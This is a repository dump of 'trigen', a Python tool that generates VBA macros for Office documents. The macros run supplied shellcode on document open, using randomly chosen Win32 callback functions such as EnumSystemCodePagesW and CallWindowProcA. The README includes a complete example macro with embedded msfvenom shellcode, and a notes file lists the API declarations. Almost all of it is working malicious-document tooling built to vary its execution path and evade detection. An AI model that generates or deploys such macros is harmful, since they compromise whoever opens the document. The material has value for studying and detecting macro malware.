├── README.md ├── trigen.py └── function_VBA_notes.txt /README.md: -------------------------------------------------------------------------------- 1 | # trigen 2 | Trigen is a Python script which uses different combinations of Win32 function calls in generated VBA to execute shellcode. 3 | 4 | Blog post - [17JAN2017 - Abusing native Windows functions for shellcode execution](http://ropgadget.com/posts/abusing_win_functions.html) 5 | 6 | Below is an example output using msfvenom to generate shellcode for input. 7 | 8 | ``` 9 | # python trigen.py "$(msfvenom --payload windows/exec CMD='calc.exe' -f c)" 10 | No platform was selected, choosing Msf::Module::Platform::Windows from the payload 11 | No Arch selected, selecting Arch: x86 from the payload 12 | No encoder or badchars specified, outputting raw payload 13 | Payload size: 193 bytes 14 | 15 | ################################################ 16 | # # 17 | # Copy VBA to Microsoft Office 97-2003 DOC # 18 | # # 19 | # Alloc: HeapAlloc # 20 | # Write: RtlMoveMemory # 21 | # ExeSC: EnumSystemCodePagesW # 22 | # # 23 | ################################################ 24 | 25 | Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long 26 | Private Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As Long 27 | Private Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) 28 | Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long 29 | 30 | Private Sub Document_Open() 31 | 32 | Dim shellCode As String 33 | Dim shellLength As Byte 34 | Dim byteArray() As Byte 35 | Dim memoryAddress As Long 36 | Dim zL As Long 37 | zL = 0 38 | Dim rL As Long 39 | 40 | shellCode = "fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6a018d85b20000005068318b6f87ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd563616c632e65786500" 41 | 42 | shellLength = Len(shellCode) / 2 43 | ReDim byteArray(0 To shellLength) 44 | 45 | For i = 0 To shellLength - 1 46 | 47 | If i = 0 Then 48 | pos = i + 1 49 | Else 50 | pos = i * 2 + 1 51 | End If 52 | Value = Mid(shellCode, pos, 2) 53 | byteArray(i) = Val("&H" & Value) 54 | 55 | Next 56 | 57 | rL = createMemory(&H40000, zL, zL) 58 | memoryAddress = allocateMemory(rL, zL, &H5000) 59 | 60 | copyMemory ByVal memoryAddress, byteArray(0), UBound(byteArray) + 1 61 | 62 | executeResult = shellExecute(memoryAddress, zL) 63 | 64 | End Sub``` 65 | -------------------------------------------------------------------------------- /trigen.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import random, sys 3 | 4 | __author__ = "Jeff White [karttoon] @noottrak" 5 | __email__ = "karttoon@gmail.com" 6 | __version__ = "1.0.1" 7 | __date__ = "04APR2017" 8 | 9 | # Dictionary structures 10 | # key = Function name 11 | # value = List of flags for supporting code to include, followed by respective declarations and VBA 12 | 13 | # Memory allocation functions 14 | memAlloc = { 15 | 'VirtualAlloc':[['ZL'], 16 | 'Private Declare Function allocateMemory Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long\n', 17 | 'memoryAddress = allocateMemory(zL, &H5000, &H1000, &H40)\n'], 18 | 'NtAllocateVirtualMemory':[['ZL', 'RL'], 19 | 'Private Declare Function allocateMemory Lib "ntdll" Alias "NtAllocateVirtualMemory" (ProcessHandle As Long, BaseAddress As Any, ByVal ZeroBits As Long, RegionSize As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long\n', 20 | 'memoryAddress = allocateMemory(ByVal -1, rL, zL, &H5000, &H1000, &H40)\n' +\ 21 | 'memoryAddress = rL\n'], 22 | 'ZwAllocateVirtualMemory':[['ZL', 'RL'], 23 | 'Private Declare Function allocateMemory Lib "ntdll" Alias "ZwAllocateVirtualMemory" (ProcessHandle As Long, BaseAddress As Any, ByVal ZeroBits As Long, RegionSize As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long\n', 24 | 'memoryAddress = allocateMemory(ByVal -1, rL, zL, &H5000, &H1000, &H40)\n' + \ 25 | 'memoryAddress = rL\n'], 26 | 'HeapAlloc':[['ZL', 'RL'], 27 | 'Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long\n' +\ 28 | 'Private Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As Long\n', 29 | 'rL = createMemory(&H40000, zL, zL)\n' +\ 30 | 'memoryAddress = allocateMemory(rL, zL, &H5000)\n'] 31 | } 32 | 33 | # Memory writing functions 34 | memWrite = { 35 | 'RtlMoveMemory':[[], 36 | 'Private Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long)\n', 37 | 'copyMemory ByVal memoryAddress, byteArray(0), UBound(byteArray) + 1\n'], 38 | 'WriteProcessMemory':[['ZL'], 39 | 'Private Declare Function copyMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long\n', 40 | 'copyMemory ByVal -1, memoryAddress, VarPtr(byteArray(0)), UBound(byteArray) + 1, zL\n'] 41 | } 42 | 43 | # Shellcode execution functions 44 | exeShell = { 45 | 'CallWindowProcA':[['ZL'], 46 | 'Private Declare Function shellExecute Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Any, ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long\n', 47 | 'executeResult = shellExecute(memoryAddress, zL, zL, zL, zL)\n'], 48 | 'CallWindowProcW':[['ZL'], 49 | 'Private Declare Function shellExecute Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Any, ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long\n', 50 | 'executeResult = shellExecute(memoryAddress, zL, zL, zL, zL)\n'], 51 | 'DialogBoxIndirectParamA':[['WH', 'MH', 'OL'], 52 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxIndirectParamA" (ByVal hInstance As Any, ByVal hDialogTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long\n', 53 | 'executeResult = shellExecute(moduleHandle, moduleHandle, windowHandle, memoryAddress, oL)\n'], 54 | 'DialogBoxIndirectParamW':[['WH', 'MH', 'OL'], 55 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxIndirectParamW" (ByVal hInstance As Any, ByVal hDialogTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long\n', 56 | 'executeResult = shellExecute(moduleHandle, moduleHandle, windowHandle, memoryAddress, oL)\n'], 57 | 'EnumCalendarInfoA':[['OL', 'RL'], 58 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumCalendarInfoA" (ByVal pCalInfoEnumProc As Any, ByVal Locale As Any, ByVal Calendar As Any, ByVal CalType As Any) As Long\n', 59 | 'rL = 3072\n' +\ 60 | 'executeResult = shellExecute(memoryAddress, rL, oL, oL)\n'], 61 | 'EnumCalendarInfoW':[['OL', 'RL'], 62 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal pCalInfoEnumProc As Any, ByVal Locale As Any, ByVal Calendar As Any, ByVal CalType As Any) As Long\n', 63 | 'rL = 3072\n' +\ 64 | 'executeResult = shellExecute(memoryAddress, rL, oL, oL)\n'], 65 | 'EnumDateFormatsA':[['ZL'], 66 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumDateFormatsA" (ByVal lpDateFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long\n', 67 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 68 | 'EnumDateFormatsW':[['ZL'], 69 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumDateFormatsW" (ByVal lpDateFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long\n', 70 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 71 | 'EnumDesktopWindows':[['ZL'], 72 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopWindows" (ByVal hDesktop As Any, ByVal lpfn As Any, ByVal lParam As Any) As Long\n', 73 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 74 | 'EnumDesktopsA':[['ZL'], 75 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopsA" (ByVal hwinsta As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 76 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 77 | 'EnumDesktopsW':[['ZL'], 78 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumDesktopsW" (ByVal hwinsta As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 79 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 80 | 'EnumLanguageGroupLocalesA':[['ZL', 'OL'], 81 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumLanguageGroupLocalesA" (ByVal lpLangGroupLocaleEnumProc As Any, ByVal LanguageGroup As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 82 | 'executeResult = shellExecute(memoryAddress, oL, zL, zL)\n'], 83 | 'EnumLanguageGroupLocalesW':[['ZL', 'OL'], 84 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumLanguageGroupLocalesW" (ByVal lpLangGroupLocaleEnumProc As Any, ByVal LanguageGroup As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 85 | 'executeResult = shellExecute(memoryAddress, oL, zL, zL)\n'], 86 | 'EnumPropsExA':[['WH'], 87 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumPropsExA" (ByVal hWnd As Any, ByVal lpEnumFunc As Any) As Long\n', 88 | 'executeResult = shellExecute(windowHandle, memoryAddress)\n'], 89 | 'EnumPropsExW':[['WH'], 90 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumPropsExW" (ByVal hWnd As Any, ByVal lpEnumFunc As Any) As Long\n', 91 | 'executeResult = shellExecute(windowHandle, memoryAddress)\n'], 92 | 'EnumPwrSchemes':[['ZL'], 93 | 'Private Declare Function shellExecute Lib "powrprof" Alias "EnumPwrSchemes" (ByVal lpfnPwrSchemesEnumProc As Any, ByVal lParam As Any) As Long\n', 94 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 95 | 'EnumResourceTypesA':[['ZL'], 96 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesA" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 97 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 98 | 'EnumResourceTypesW':[['ZL'], 99 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 100 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 101 | 'EnumResourceTypesExA':[['ZL'], 102 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesExA" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long\n', 103 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL, zL)\n'], 104 | 'EnumResourceTypesExW':[['ZL'], 105 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumResourceTypesExW" (ByVal hModule As Any, ByVal lpEnumFunc As Any, ByVal lParam As Any, ByVal dwFlags As Any, ByVal LangId As Any) As Long\n', 106 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL, zL)\n'], 107 | 'EnumSystemCodePagesA':[['ZL'], 108 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesA" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long\n', 109 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 110 | 'EnumSystemCodePagesW':[['ZL'], 111 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemCodePagesW" (ByVal lpCodePageEnumProc As Any, ByVal dwFlags As Any) As Long\n', 112 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 113 | 'EnumSystemLanguageGroupsA':[['ZL'], 114 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLanguageGroupsA" (ByVal lpLanguageGroupEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 115 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 116 | 'EnumSystemLanguageGroupsW':[['ZL'], 117 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLanguageGroupsW" (ByVal lpLanguageGroupEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 118 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 119 | 'EnumSystemLocalesA':[['ZL'], 120 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLocalesA" (ByVal lpLocaleEnumProc As Any, ByVal dwFlags As Any) As Long\n', 121 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 122 | 'EnumSystemLocalesW':[['ZL'], 123 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumSystemLocalesW" (ByVal lpLocaleEnumProc As Any, ByVal dwFlags As Any) As Long\n', 124 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 125 | 'EnumThreadWindows':[['ZL'], 126 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumThreadWindows" (ByVal dwThreadId As Any, ByVal lpfn As Any, ByVal lParam As Any) As Long\n', 127 | 'executeResult = shellExecute(zL, memoryAddress, zL)\n'], 128 | 'EnumTimeFormatsA':[['ZL'], 129 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumTimeFormatsA" (ByVal lpTimeFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long\n', 130 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 131 | 'EnumTimeFormatsW':[['ZL'], 132 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumTimeFormatsW" (ByVal lpTimeFmtEnumProc As Any, ByVal Locale As Any, ByVal dwFlags As Any) As Long\n', 133 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 134 | 'EnumUILanguagesA':[['ZL'], 135 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumUILanguagesA" (ByVal lpUILanguageEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 136 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 137 | 'EnumUILanguagesW':[['ZL'], 138 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumUILanguagesW" (ByVal lpUILanguageEnumProc As Any, ByVal dwFlags As Any, ByVal lParam As Any) As Long\n', 139 | 'executeResult = shellExecute(memoryAddress, zL, zL)\n'], 140 | 'EnumWindowStationsA':[['ZL'], 141 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindowStationsA" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 142 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 143 | 'EnumWindowStationsW':[['ZL'], 144 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindowStationsW" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 145 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 146 | 'EnumWindows':[['ZL'], 147 | 'Private Declare Function shellExecute Lib "user32" Alias "EnumWindows" (ByVal lpEnumFunc As Any, ByVal lParam As Any) As Long\n', 148 | 'executeResult = shellExecute(memoryAddress, zL)\n'], 149 | 'EnumerateLoadedModules':[['PH', 'ZL'], 150 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModules" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long\n', 151 | 'executeResult = shellExecute(processHandle, memoryAddress, zL)\n'], 152 | 'EnumerateLoadedModulesEx':[['PH', 'ZL'], 153 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModulesEx" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long\n', 154 | 'executeResult = shellExecute(processHandle, memoryAddress, zL)\n'], 155 | 'EnumerateLoadedModulesExW':[['PH', 'ZL'], 156 | 'Private Declare Function shellExecute Lib "dbghelp" Alias "EnumerateLoadedModulesExW" (ByVal hProcess As Any, ByVal EnumLoadedModulesCallback As Any, ByVal UserContext As Any) As Long\n', 157 | 'executeResult = shellExecute(processHandle, memoryAddress, zL)\n'], 158 | 'GrayStringA':[['MH', 'OL'], 159 | 'Private Declare Function shellExecute Lib "user32" Alias "GrayStringA" (ByVal hDC As Any, ByVal hBrush As Any, ByVal lpOutputFunc As Any, ByVal lpData As Any, ByVal nCount As Any, ByVal X As Any, ByVal Y As Any, ByVal nWidth As Any, ByVal nHeight As Any) As Long\n', 160 | 'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, oL, oL, oL, oL, oL)\n'], 161 | 'GrayStringW':[['MH', 'OL'], 162 | 'Private Declare Function shellExecute Lib "user32" Alias "GrayStringW" (ByVal hDC As Any, ByVal hBrush As Any, ByVal lpOutputFunc As Any, ByVal lpData As Any, ByVal nCount As Any, ByVal X As Any, ByVal Y As Any, ByVal nWidth As Any, ByVal nHeight As Any) As Long\n', 163 | 'executeResult = shellExecute(moduleHandle, oL, memoryAddress, oL, oL, oL, oL, oL, oL)\n'], 164 | 'NotifyIpInterfaceChange':[['ZL', 'OL'], 165 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyIpInterfaceChange" (ByVal Family As Any, ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long\n', 166 | 'executeResult = shellExecute(zL, memoryAddress, oL, oL, oL)\n'], 167 | 'NotifyTeredoPortChange':[['OL'], 168 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyTeredoPortChange" (ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long\n', 169 | 'executeResult = shellExecute(memoryAddress, oL, oL, oL)\n'], 170 | 'NotifyUnicastIpAddressChange':[['ZL', 'OL'], 171 | 'Private Declare Function shellExecute Lib "iphlpapi" Alias "NotifyUnicastIpAddressChange" (ByVal Family As Any, ByVal Callback As Any, ByVal CallerContext As Any, ByVal InitialNotification As Any, ByVal NotificationHandle As Any) As Long\n', 172 | 'executeResult = shellExecute(zL, memoryAddress, oL, oL, oL)\n'], 173 | 'SHCreateThread':[['ZL'], 174 | 'Private Declare Function shellExecute Lib "shlwapi" Alias "SHCreateThread" (ByVal pfnThreadProc As Any, ByVal pData As Any, ByVal dwFlags As Any, ByVal pfnCallback As Any) As Long\n', 175 | 'executeResult = shellExecute(zL, zL, zL, memoryAddress)\n'], 176 | 'SHCreateThreadWithHandle':[['PH', 'ZL'], 177 | 'Private Declare Function shellExecute Lib "shlwapi" Alias "SHCreateThreadWithHandle" (ByVal pfnThreadProc As Any, ByVal pData As Any, ByVal flags As Any, ByVal pfnCallback As Any, ByVal pHandle As Any) As Long\n', 178 | 'executeResult = shellExecute(zL, zL, zL, memoryAddress, processHandle)\n'], 179 | 'SendMessageCallbackA':[['WH', 'ZL'], 180 | 'Private Declare Function shellExecute Lib "user32" Alias "SendMessageCallbackA" (ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any, ByVal lpCallBack As Any, ByVal dwData As Any) As Long\n', 181 | 'executeResult = shellExecute(windowHandle, zL, zL, zL, memoryAddress, zL)\n'], 182 | 'SendMessageCallbackW':[['WH', 'ZL'], 183 | 'Private Declare Function shellExecute Lib "user32" Alias "SendMessageCallbackW" (ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any, ByVal lpCallBack As Any, ByVal dwData As Any) As Long\n', 184 | 'executeResult = shellExecute(windowHandle, zL, zL, zL, memoryAddress, zL)\n'], 185 | # Works except you need to trigger an event 186 | # 'SetWinEventHook':[['MH', 'ZL', 'OL'], 187 | # 'Private Declare Function shellExecute Lib "user32" Alias "SetWinEventHook" (ByVal eventMin As Any, ByVal eventMax As Any, ByVal hmodWinEventProc As Any, ByVal lpfnWinEventProc As Any, ByVal idProcess As Any, ByVal idThread As Any, ByVal dwflags As Any) As Long\n', 188 | # 'executeResult = shellExecute(zL, oL, moduleHandle, memoryAddress, zL, zL, zL)\n'], 189 | 'SetWindowsHookExA':[['ZL'], 190 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWindowsHookExA" (ByVal idHook As Any, ByVal lpfn As Any, ByVal hMod As Any, ByVal dwThreadId As Any) As Long\n', 191 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL)\n'], 192 | 'SetWindowsHookExW':[['ZL'], 193 | 'Private Declare Function shellExecute Lib "user32" Alias "SetWindowsHookExW" (ByVal idHook As Any, ByVal lpfn As Any, ByVal hMod As Any, ByVal dwThreadId As Any) As Long\n', 194 | 'executeResult = shellExecute(zL, memoryAddress, zL, zL)\n'] 195 | } 196 | 197 | # Random select functions from each dictionary 198 | allocFunc = memAlloc.keys()[random.randrange(0,len(memAlloc),1)] 199 | writeFunc = memWrite.keys()[random.randrange(0,len(memWrite),1)] 200 | shellFunc = exeShell.keys()[random.randrange(0,len(exeShell),1)] 201 | 202 | # Determine flags for support code required by the functions 203 | macFlag = [] 204 | 205 | for flagList in (memAlloc[allocFunc][0], memWrite[writeFunc][0], exeShell[shellFunc][0]): 206 | for flag in flagList: 207 | if flag not in macFlag: 208 | macFlag.append(flag) 209 | 210 | macro = '' 211 | 212 | macro += ''' 213 | ################################################ 214 | # # 215 | # Copy VBA to Microsoft Office 97-2003 DOC # 216 | # # 217 | # Alloc: %-35s # 218 | # Write: %-35s # 219 | # ExeSC: %-35s # 220 | # # 221 | ################################################\n 222 | ''' % (allocFunc, writeFunc, shellFunc) 223 | 224 | # Headers 225 | macro += memAlloc[allocFunc][1] 226 | macro += memWrite[writeFunc][1] 227 | macro += exeShell[shellFunc][1] 228 | if 'WH' in macFlag: 229 | macro += 'Private Declare Function getWindowHandle Lib "user32" Alias "GetActiveWindow" () As Long' 230 | if 'PH' in macFlag: 231 | macro += 'Private Declare Function getProcessHandle Lib "kernel32" Alias "GetCurrentProcess" () As Long' 232 | if 'TH' in macFlag: 233 | macro += 'Private Declare Function getThreadHandle Lib "kernel32" Alias "GetCurrentThread" () As Long' 234 | if 'MH' in macFlag: 235 | macro += 'Private Declare Function getModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long' 236 | 237 | # Body 238 | macro += '''\n 239 | Private Sub Document_Open() 240 | 241 | Dim shellCode As String 242 | Dim shellLength As Long 243 | Dim byteArray() As Byte 244 | Dim memoryAddress As Long 245 | ''' 246 | 247 | # Supporting code for functions 248 | if 'WH' in macFlag: 249 | macro += 'Dim windowHandle As Long\n' +\ 250 | 'windowHandle = getWindowHandle()\n' 251 | if 'PH' in macFlag: 252 | macro += 'Dim ProcessHandle As Long\n' +\ 253 | 'ProcessHandle = getProcessHandle()\n' 254 | if 'TH' in macFlag: 255 | macro += 'Dim threadHandle As Long\n' +\ 256 | 'threadHandle = getThreadHandle()\n' 257 | if 'MH' in macFlag: 258 | macro += 'Dim moduleHandle As Long\n' +\ 259 | 'moduleHandle = getModuleHandle(vbNullString)\n' 260 | if 'ZL' in macFlag: 261 | macro += 'Dim zL As Long\n' +\ 262 | 'zL = 0\n' 263 | if 'OL' in macFlag: 264 | macro += 'Dim oL As Long\n' +\ 265 | 'oL = 1\n' 266 | if 'RL' in macFlag: 267 | macro += 'Dim rL As Long\n' 268 | 269 | # Filter msfvenom C/Py output to get a hex-string, 'FEEDADEADFEDBABE' 270 | if len(sys.argv) == 2: 271 | sys.argv[1] = sys.argv[1].replace('unsigned char buf[]', '') 272 | sys.argv[1] = sys.argv[1].replace('\n', '') 273 | sys.argv[1] = sys.argv[1].replace('buf', '') 274 | sys.argv[1] = sys.argv[1].replace('+', '') 275 | sys.argv[1] = sys.argv[1].replace('=', '') 276 | sys.argv[1] = sys.argv[1].replace('\\x', '') 277 | sys.argv[1] = sys.argv[1].replace('"', '') 278 | sys.argv[1] = sys.argv[1].replace(';', '') 279 | sys.argv[1] = sys.argv[1].replace(' ', '') 280 | 281 | print "temp\n%s\n" % sys.argv[1] 282 | 283 | if len(sys.argv[1]) > 256: 284 | macro += ''' 285 | shellCode = "%s"''' % sys.argv[1][0:256] 286 | for i in range(256,len(sys.argv[1]),256): 287 | macro += ''' 288 | shellCode = shellCode & "%s"''' % sys.argv[1][i:i+256] 289 | else: 290 | macro += ''' 291 | shellCode = "%s"''' % sys.argv[1] 292 | else: 293 | print '[!] ERROR: Supply hexadecimal shellcode as input (eg msfvenom -p windows/exec CMD=\'calc.exe\' -f c)' 294 | sys.exit(1) 295 | 296 | macro += '''\n 297 | shellLength = Len(shellCode) / 2 298 | ReDim byteArray(0 To shellLength) 299 | 300 | For i = 0 To shellLength - 1 301 | 302 | If i = 0 Then 303 | pos = i + 1 304 | Else 305 | pos = i * 2 + 1 306 | End If 307 | Value = Mid(shellCode, pos, 2) 308 | byteArray(i) = Val("&H" & Value) 309 | 310 | Next\n 311 | ''' 312 | 313 | macro += memAlloc[allocFunc][2] + '\n' 314 | macro += memWrite[writeFunc][2] + '\n' 315 | macro += exeShell[shellFunc][2] + '\n' 316 | 317 | macro += "End Sub" 318 | 319 | print macro 320 | -------------------------------------------------------------------------------- /function_VBA_notes.txt: -------------------------------------------------------------------------------- 1 | ' ############################### 2 | ' # MEMORY ALLOCATION FUNCTIONS # 3 | ' ############################### 4 | 5 | 'Private Declare Function allocateMemory Lib "kernel32" Alias "VirtualAlloc" (ByVal lpaddr As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long 6 | 'Private Declare Function allocateMemory Lib "ntdll" Alias "NtAllocateVirtualMemory" (ProcessHandle As Long, BaseAddress As Any, ByVal ZeroBits As Long, RegionSize As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long 7 | 'Private Declare Function allocateMemory Lib "ntdll" Alias "ZwAllocateVirtualMemory" (ProcessHandle As Long, BaseAddress As Any, ByVal ZeroBits As Long, RegionSize As Long, ByVal AllocationType As Long, ByVal Protect As Long) As Long 8 | 'Private Declare Function createMemory Lib "kernel32" Alias "HeapCreate" (ByVal flOptions As Long, ByVal dwInitialSize As Long, ByVal dwMaximumSize As Long) As Long 9 | 'Private Declare Function allocateMemory Lib "kernel32" Alias "HeapAlloc" (ByVal hHeap As Long, ByVal dwFlags As Long, ByVal dwBytes As Long) As Long 10 | 11 | ' ########################## 12 | ' # WRITE MEMORY FUNCTIONS # 13 | ' ########################## 14 | 15 | 'Private Declare Sub copyMemory Lib "ntdll" Alias "RtlMoveMemory" (pDst As Any, pSrc As Any, ByVal ByteLen As Long) 16 | 'Private Declare Function copyMemory Lib "kernel32" Alias "WriteProcessMemory" (ByVal hProcess As Long, ByVal lpBaseAddress As Any, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long 17 | 18 | ' ######################## 19 | ' # SUPPORTING FUNCTIONS # 20 | ' ######################## 21 | 22 | Private Declare Function getWindowHandle Lib "user32" Alias "GetActiveWindow" () As Long 23 | Private Declare Function getProcessHandle Lib "kernel32" Alias "GetCurrentProcess" () As Long 24 | Private Declare Function getThreadHandle Lib "kernel32" Alias "GetCurrentThread" () As Long 25 | Private Declare Function getModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long 26 | 27 | ' ############################# 28 | ' # SHELLCODE PIVOT FUNCTIONS # 29 | ' ############################# 30 | 31 | ' ##################### 32 | ' # WORKING FUNCTIONS # 33 | ' ##################### 34 | 35 | 'Private Declare Function shellExecute Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Any, ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long 36 | 'Private Declare Function shellExecute Lib "user32" Alias "CallWindowProcW" (ByVal lpPrevWndFunc As Any, ByVal hWnd As Any, ByVal Msg As Any, ByVal wParam As Any, ByVal lParam As Any) As Long 37 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxIndirectParamA" (ByVal hInstance As Any, ByVal hDialogTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 38 | 'Private Declare Function shellExecute Lib "user32" Alias "DialogBoxIndirectParamW" (ByVal hInstance As Any, ByVal hDialogTemplate As Any, ByVal hWndParent As Any, ByVal lpDialogFunc As Any, ByVal dwInitParam As Any) As Long 39 | 'Private Declare Function shellExecute Lib "kernel32" Alias "EnumCalendarInfoA" (ByVal pCalInfoEnumProc As Any, ByVal Locale As Any, ByVal Calendar As 